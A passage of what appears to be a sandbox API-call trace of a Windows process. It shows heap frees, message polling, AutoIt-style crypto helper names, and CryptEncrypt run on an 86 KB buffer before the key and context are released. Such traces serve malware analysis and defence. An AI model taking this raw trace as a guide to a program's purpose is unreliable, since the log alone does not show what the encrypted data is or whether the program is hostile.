| out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.520] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0176.520] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2838, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2838*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.522] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0176.522] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0176.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0176.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.523] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.523] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.523] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.523] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.524] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.525] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x14fb7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x14fc0) returned 1 [0176.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.525] CharLowerBuffW (in: lpsz="byte[85953]", cchLength=0xb | out: lpsz="byte[85953]") returned 0xb [0176.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.529] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.529] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.532] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa88f88*, pdwDataLen=0x87e820*=0x14fb7, dwBufLen=0x14fc0 | out: pbData=0xa88f88*, pdwDataLen=0x87e820*=0x14fc0) returned 1 [0176.532] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.532] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.532] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.535] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.535] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.535] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.535] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.535] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.544] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.544] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.544] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.551] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0176.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.551] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0176.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.551] CryptDestroyKey (hKey=0x90af18) returned 1 [0176.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.551] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.551] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.551] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.552] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.552] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.552] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0176.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0176.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.552] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0176.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.552] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0176.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.552] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0176.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.552] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0176.553] PeekMessageW (in: 